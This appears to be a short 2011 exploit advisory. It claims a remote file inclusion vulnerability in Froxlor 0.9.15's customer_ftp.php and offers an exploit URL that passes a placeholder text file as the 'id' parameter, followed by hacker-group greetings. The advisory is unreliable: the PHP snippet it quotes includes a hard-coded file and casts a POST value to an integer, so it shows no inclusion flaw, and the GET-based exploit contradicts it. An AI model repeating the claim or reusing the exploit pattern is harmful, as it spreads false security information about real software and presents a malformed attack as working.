Froxlor version 0.9.15 suffers from a remote file inclusion vulnerability.
8ebcce5b4c99d57ff95d79211a92b229bf99bb5d0ed9f349262716d627c8d152
# Exploit Title: Froxlor v 0.9.15 Remote file include vulnerability
# Google Dork: © 2009-2010 by the Froxlor Team
# Date: 26/1/2011
# Author: DIES3L
# Software Link: http://www.froxlor.org
# Version: v 0.9.15
# Tested on: ubuntu + win7
# Email : zxn@Hotmail.com
#######################################################
File : customer_ftp.php
http://localhost/[path]/customer_ftp.php
Code :
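<?php
// Include the initialisation script from a hard-coded relative path
require ("./lib/init.php");
// Read 'id' from the POST body and coerce it to an integer
$id = intval($_POST['id']);
?>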
Exploit :
http://127.0.0.1/[path]/customer_ftp.php?id= [ DIES3L.txt ]
NOTE :-
** ONLY FOR PHP 4.x.x
Have Enjoy :)
##############################################################
#
Gr33t'z t0 : #
WwW.p0c.cc - WwW.D99Y.CoM - WwW.v4-Team.com - ALL My Friends #
#
##############################################################